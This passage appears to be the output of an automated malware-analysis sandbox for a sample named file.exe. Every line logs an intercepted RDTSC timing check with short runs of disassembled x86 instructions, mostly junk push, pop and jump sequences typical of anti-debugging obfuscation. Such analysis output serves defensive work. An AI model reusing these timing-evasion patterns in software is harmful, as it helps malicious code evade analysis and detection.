Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAFBD8 second address: AAFC05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BDh 0x00000007 push edi 0x00000008 jns 00007FA9347D66B6h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FA9347D66C2h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB547D second address: AB5481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3EF6 second address: AB3EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4050 second address: AB406D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA934C8B32Bh 0x0000000b jng 00007FA934C8B326h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB406D second address: AB4084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66C2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4084 second address: AB4089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4089 second address: AB4097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007FA9347D66B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB44D8 second address: AB44DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB44DC second address: AB44E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4770 second address: AB4774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB48DE second address: AB4904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FA9347D66CEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4904 second address: AB4912 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4A46 second address: AB4A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4A4E second address: AB4A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA934C8B326h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4BB7 second address: AB4BF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BDh 0x00000007 jmp 00007FA9347D66BCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FA9347D66B6h 0x00000017 jmp 00007FA9347D66C7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4BF4 second address: AB4C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4C00 second address: AB4C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4EDC second address: AB4F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA934C8B326h 0x00000009 jmp 00007FA934C8B335h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4F00 second address: AB4F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7C37 second address: AB7C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7C3C second address: AB7C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBF59 second address: ABBF76 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA934C8B326h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FA934C8B326h 0x00000017 jne 00007FA934C8B326h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBF76 second address: ABBFA4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA9347D66C5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA9347D66C1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBFA4 second address: ABBFAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABBB9E second address: ABBBA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC22E2 second address: AC22E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0C4B second address: AC0C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC0EB3 second address: AC0EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B338h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FA934C8B326h 0x0000000f jmp 00007FA934C8B335h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1206 second address: AC120C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC120C second address: AC1211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1397 second address: AC139C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC139C second address: AC13A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA934C8B326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC13A6 second address: AC13D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FA9347D66B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FA9347D66BCh 0x00000012 jne 00007FA9347D66B6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jnl 00007FA9347D66BEh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC13D0 second address: AC13DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA934C8B326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73FCD second address: A73FDB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73FDB second address: A73FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73FDF second address: A74045 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007FA9347D66C5h 0x00000013 mov ebx, dword ptr [ebp+1248815Ah] 0x00000019 mov edx, dword ptr [ebp+122D3A2Ch] 0x0000001f add eax, ebx 0x00000021 jc 00007FA9347D66B9h 0x00000027 movzx edx, di 0x0000002a push eax 0x0000002b jmp 00007FA9347D66BDh 0x00000030 mov dword ptr [esp], eax 0x00000033 mov dword ptr [ebp+122D368Fh], edi 0x00000039 movsx edx, si 0x0000003c push 00000004h 0x0000003e sbb edi, 65F8FB96h 0x00000044 nop 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jnc 00007FA9347D66B6h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A74045 second address: A74067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c ja 00007FA934C8B32Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1516 second address: AC1535 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jc 00007FA9347D66C0h 0x00000011 jmp 00007FA9347D66BAh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC1535 second address: AC1539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC519A second address: AC51AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC51AB second address: AC51B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC51B3 second address: AC51BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC51BB second address: AC51BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC51BF second address: AC51E5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FA9347D66B6h 0x00000012 jmp 00007FA9347D66C4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC51E5 second address: AC520B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d jmp 00007FA934C8B335h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC520B second address: AC520F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC520F second address: AC5219 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA934C8B326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC5219 second address: AC522F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA9347D66BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC522F second address: AC5233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4A6E second address: AC4A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FA9347D66BEh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4C0F second address: AC4C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC4E81 second address: AC4E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C4h 0x00000007 jp 00007FA9347D66C2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC99E2 second address: AC99E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9017 second address: AC9034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 jnl 00007FA9347D66BAh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 je 00007FA9347D66CAh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC91BB second address: AC91CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA934C8B326h 0x0000000a js 00007FA934C8B326h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC91CB second address: AC91EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA9347D66C1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC91EE second address: AC9209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9209 second address: AC9213 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9213 second address: AC921D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA934C8B32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC939A second address: AC93A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC95F7 second address: AC95FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC95FD second address: AC9612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FA9347D66BDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A310BE second address: A310D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007FA934C8B326h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACEBF1 second address: ACEBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FA9347D66BEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACEBFE second address: ACEC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACEC04 second address: ACEC2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 jmp 00007FA9347D66BBh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e jmp 00007FA9347D66BFh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73919 second address: A7398D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA934C8B326h 0x0000000a popad 0x0000000b add dword ptr [esp], 6E9662B8h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FA934C8B328h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c call 00007FA934C8B329h 0x00000031 jmp 00007FA934C8B335h 0x00000036 push eax 0x00000037 jno 00007FA934C8B334h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 jng 00007FA934C8B334h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACF4B4 second address: ACF4D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C3h 0x00000007 pushad 0x00000008 jg 00007FA9347D66B6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACF82E second address: ACF832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACF832 second address: ACF838 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACF838 second address: ACF842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA934C8B326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACFAF0 second address: ACFAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACFAF5 second address: ACFB3B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA934C8B32Ch 0x00000008 push esi 0x00000009 jno 00007FA934C8B326h 0x0000000f jmp 00007FA934C8B32Bh 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 jmp 00007FA934C8B338h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jl 00007FA934C8B326h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5B69 second address: AD5B87 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA9347D66C2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5B87 second address: AD5B8C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8798 second address: AD87BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA9347D66C8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD87BB second address: AD87C9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD87C9 second address: AD87CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD87CD second address: AD87D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD87D3 second address: AD87D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD87D9 second address: AD87DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD87DF second address: AD87E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8933 second address: AD8939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8E7E second address: AD8EBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA9347D66C3h 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007FA9347D66C4h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jne 00007FA9347D66B6h 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD8FED second address: AD8FF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FA934C8B326h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF1E8 second address: ADF20B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA9347D66CBh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF5FB second address: ADF601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF601 second address: ADF606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF606 second address: ADF61F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF61F second address: ADF623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF623 second address: ADF63C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B335h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADF76B second address: ADF77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA9347D66B6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADFBD7 second address: ADFC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007FA934C8B334h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e jne 00007FA934C8B326h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
